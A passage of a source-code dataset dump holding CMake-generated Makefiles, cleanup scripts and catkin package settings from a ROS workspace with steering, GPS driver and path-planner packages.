Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... zfmsg_gennodejs\"\n\t@echo \"... zfmsg_genpy\"\n\t@echo \"... zfmsg_generate_messages_cpp\"\n\t@echo \"... install/local\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_MotionCmd\"\n\t@echo \"... install/strip\"\n\t@echo \"... zfmsg_generate_messages\"\n\t@echo \"... install\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_BreakStatus\"\n\t@echo \"... zfmsg_generate_messages_eus\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_SteerStatus\"\n\t@echo \"... zfmsg_gencpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfo\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfoAW\"\n\t@echo \"... zfmsg_generate_messages_py\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_ThrottleGearStatus\"\n\t@echo \"... zfmsg_geneus\"\n\t@echo \"... edit_cache\"\n\t@echo \"... zfmsg_genlisp\"\n\t@echo \"... zfmsg_generate_messages_lisp\"\n\t@echo \"... zfmsg_generate_messages_nodejs\"\n\t@echo \"... test\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7572254538536072,
"alphanum_fraction": 0.7572254538536072,
"avg_line_length": 42.25,
"blob_id": "2d4e599f47e2427fc5354d4c01e876d1b1c88c5d",
"content_id": "a01a9b87e8d9590538ea6def4232df3b36f21906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 4,
"path": "/build/zfmsg/catkin_generated/installspace/zfmsg-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${zfmsg_DIR}/..\" \"msg\" zfmsg_MSG_INCLUDE_DIRS UNIQUE)\nset(zfmsg_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7573333382606506,
"alphanum_fraction": 0.7786666750907898,
"avg_line_length": 36.5,
"blob_id": "5be91536b5684464b4ba49c3abe5e38fa46e0315",
"content_id": "c62cf4f7161b821f7cfcd354d893eb0c34028a2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 10,
"path": "/build/path/CMakeFiles/gps_planner.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/gps_planner.dir/src/gps_planner.cpp.o\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/path/gps_planner.pdb\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/path/gps_planner\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/gps_planner.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7544757127761841,
"alphanum_fraction": 0.7851662635803223,
"avg_line_length": 38.099998474121094,
"blob_id": "98fe7f87101d3f53e5fcc3415de75b8740caa9e8",
"content_id": "dc55389acfd96e7a789690f42fc3db763d043dd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_cpp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs/pos320.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs/pose2dArray.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7223065495491028,
"alphanum_fraction": 0.7283763289451599,
"avg_line_length": 40.25,
"blob_id": "f23b36dbbe584a3502df7b14775a2115b3bf8fa3",
"content_id": "c731511e278ca81bbf4ccb99317e33bbcdd7f42e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/build/steer/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"steer\")\nset(steer_VERSION \"0.1.0\")\nset(steer_MAINTAINER \"Your Name <[email protected]>\")\nset(steer_PACKAGE_FORMAT \"2\")\nset(steer_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_BUILD_EXPORT_DEPENDS )\nset(steer_BUILDTOOL_DEPENDS \"catkin\")\nset(steer_BUILDTOOL_EXPORT_DEPENDS )\nset(steer_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_TEST_DEPENDS )\nset(steer_DOC_DEPENDS )\nset(steer_URL_WEBSITE \"http://wiki.ros.org/steer\")\nset(steer_URL_BUGTRACKER \"\")\nset(steer_URL_REPOSITORY \"\")\nset(steer_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.7030789256095886,
"alphanum_fraction": 0.7531555891036987,
"avg_line_length": 35.7744026184082,
"blob_id": "20d91006ff313cccb5b3482ce4d79b667773a461",
"content_id": "4cdb7ddec85d1cda93090ce7bf0b270b70bb92c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 16954,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 461,
"path": "/build/pos320/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/pos320/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\npos320/CMakeFiles/driver.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/driver.dir/rule\n.PHONY : pos320/CMakeFiles/driver.dir/rule\n\n# Convenience name for target.\ndriver: pos320/CMakeFiles/driver.dir/rule\n\n.PHONY : driver\n\n# fast build rule for target.\ndriver/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/driver.dir/build.make pos320/CMakeFiles/driver.dir/build\n.PHONY : driver/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_genpy.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_genpy.dir/rule\n\n# Convenience name for target.\npos320_genpy: pos320/CMakeFiles/pos320_genpy.dir/rule\n\n.PHONY : pos320_genpy\n\n# fast build rule for target.\npos320_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_genpy.dir/build.make pos320/CMakeFiles/pos320_genpy.dir/build\n.PHONY : pos320_genpy/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_py: pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n\n.PHONY : pos320_generate_messages_py\n\n# fast build rule for target.\npos320_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_py.dir/build.make pos320/CMakeFiles/pos320_generate_messages_py.dir/build\n.PHONY : pos320_generate_messages_py/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages.dir/rule\n\n# Convenience name for target.\npos320_generate_messages: pos320/CMakeFiles/pos320_generate_messages.dir/rule\n\n.PHONY : pos320_generate_messages\n\n# fast build rule for target.\npos320_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages.dir/build.make pos320/CMakeFiles/pos320_generate_messages.dir/build\n.PHONY : pos320_generate_messages/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_geneus.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_geneus.dir/rule\n\n# Convenience name for target.\npos320_geneus: pos320/CMakeFiles/pos320_geneus.dir/rule\n\n.PHONY : pos320_geneus\n\n# fast build rule for target.\npos320_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_geneus.dir/build.make pos320/CMakeFiles/pos320_geneus.dir/build\n.PHONY : pos320_geneus/fast\n\n# Convenience name for target.\npos320/CMakeFiles/simulator.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/simulator.dir/rule\n.PHONY : pos320/CMakeFiles/simulator.dir/rule\n\n# Convenience name for target.\nsimulator: pos320/CMakeFiles/simulator.dir/rule\n\n.PHONY : simulator\n\n# fast build rule for target.\nsimulator/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/simulator.dir/build.make pos320/CMakeFiles/simulator.dir/build\n.PHONY : simulator/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_eus: pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n\n.PHONY : pos320_generate_messages_eus\n\n# fast build rule for target.\npos320_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_eus.dir/build.make pos320/CMakeFiles/pos320_generate_messages_eus.dir/build\n.PHONY : pos320_generate_messages_eus/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_cpp: pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n\n.PHONY : pos320_generate_messages_cpp\n\n# fast build rule for target.\npos320_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_cpp.dir/build.make pos320/CMakeFiles/pos320_generate_messages_cpp.dir/build\n.PHONY : pos320_generate_messages_cpp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_lisp: pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n\n.PHONY : pos320_generate_messages_lisp\n\n# fast build rule for target.\npos320_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_lisp.dir/build.make pos320/CMakeFiles/pos320_generate_messages_lisp.dir/build\n.PHONY : pos320_generate_messages_lisp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_gencpp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_gencpp.dir/rule\n\n# Convenience name for target.\npos320_gencpp: pos320/CMakeFiles/pos320_gencpp.dir/rule\n\n.PHONY : pos320_gencpp\n\n# fast build rule for target.\npos320_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_gencpp.dir/build.make pos320/CMakeFiles/pos320_gencpp.dir/build\n.PHONY : pos320_gencpp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_genlisp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_genlisp.dir/rule\n\n# Convenience name for target.\npos320_genlisp: pos320/CMakeFiles/pos320_genlisp.dir/rule\n\n.PHONY : pos320_genlisp\n\n# fast build rule for target.\npos320_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_genlisp.dir/build.make pos320/CMakeFiles/pos320_genlisp.dir/build\n.PHONY : pos320_genlisp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_nodejs: pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n\n.PHONY : pos320_generate_messages_nodejs\n\n# fast build rule for target.\npos320_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/build.make pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/build\n.PHONY : pos320_generate_messages_nodejs/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_gennodejs.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_gennodejs.dir/rule\n\n# Convenience name for target.\npos320_gennodejs: pos320/CMakeFiles/pos320_gennodejs.dir/rule\n\n.PHONY : pos320_gennodejs\n\n# fast build rule for target.\npos320_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_gennodejs.dir/build.make pos320/CMakeFiles/pos320_gennodejs.dir/build\n.PHONY : pos320_gennodejs/fast\n\nsrc/driver.o: src/driver.cpp.o\n\n.PHONY : src/driver.o\n\n# target to build an object file\nsrc/driver.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/driver.dir/build.make pos320/CMakeFiles/driver.dir/src/driver.cpp.o\n.PHONY : src/driver.cpp.o\n\nsrc/driver.i: src/driver.cpp.i\n\n.PHONY : src/driver.i\n\n# target to preprocess a source file\nsrc/driver.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/driver.dir/build.make pos320/CMakeFiles/driver.dir/src/driver.cpp.i\n.PHONY : src/driver.cpp.i\n\nsrc/driver.s: src/driver.cpp.s\n\n.PHONY : src/driver.s\n\n# target to generate assembly for a file\nsrc/driver.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/driver.dir/build.make pos320/CMakeFiles/driver.dir/src/driver.cpp.s\n.PHONY : src/driver.cpp.s\n\nsrc/simulator.o: src/simulator.cpp.o\n\n.PHONY : src/simulator.o\n\n# target to build an object file\nsrc/simulator.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/simulator.dir/build.make pos320/CMakeFiles/simulator.dir/src/simulator.cpp.o\n.PHONY : src/simulator.cpp.o\n\nsrc/simulator.i: src/simulator.cpp.i\n\n.PHONY : src/simulator.i\n\n# target to preprocess a source file\nsrc/simulator.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/simulator.dir/build.make pos320/CMakeFiles/simulator.dir/src/simulator.cpp.i\n.PHONY : src/simulator.cpp.i\n\nsrc/simulator.s: src/simulator.cpp.s\n\n.PHONY : src/simulator.s\n\n# target to generate assembly for a file\nsrc/simulator.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/simulator.dir/build.make pos320/CMakeFiles/simulator.dir/src/simulator.cpp.s\n.PHONY : src/simulator.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... edit_cache\"\n\t@echo \"... test\"\n\t@echo \"... install/local\"\n\t@echo \"... driver\"\n\t@echo \"... pos320_genpy\"\n\t@echo \"... pos320_generate_messages_py\"\n\t@echo \"... pos320_generate_messages\"\n\t@echo \"... list_install_components\"\n\t@echo \"... install/strip\"\n\t@echo \"... pos320_geneus\"\n\t@echo \"... simulator\"\n\t@echo \"... pos320_generate_messages_eus\"\n\t@echo \"... pos320_generate_messages_cpp\"\n\t@echo \"... pos320_generate_messages_lisp\"\n\t@echo \"... pos320_gencpp\"\n\t@echo \"... pos320_genlisp\"\n\t@echo \"... install\"\n\t@echo \"... pos320_generate_messages_nodejs\"\n\t@echo \"... pos320_gennodejs\"\n\t@echo \"... src/driver.o\"\n\t@echo \"... src/driver.i\"\n\t@echo \"... src/driver.s\"\n\t@echo \"... src/simulator.o\"\n\t@echo \"... src/simulator.i\"\n\t@echo \"... src/simulator.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.6660666465759277,
"alphanum_fraction": 0.6742487549781799,
"avg_line_length": 38.751033782958984,
"blob_id": "fb5035ab40221fbc40739bdf2dec3203893f75a1",
"content_id": "6f70462cbc6cda2cff7a280302e5077f63fe94a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 67220,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 1691,
"path": "/build/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : 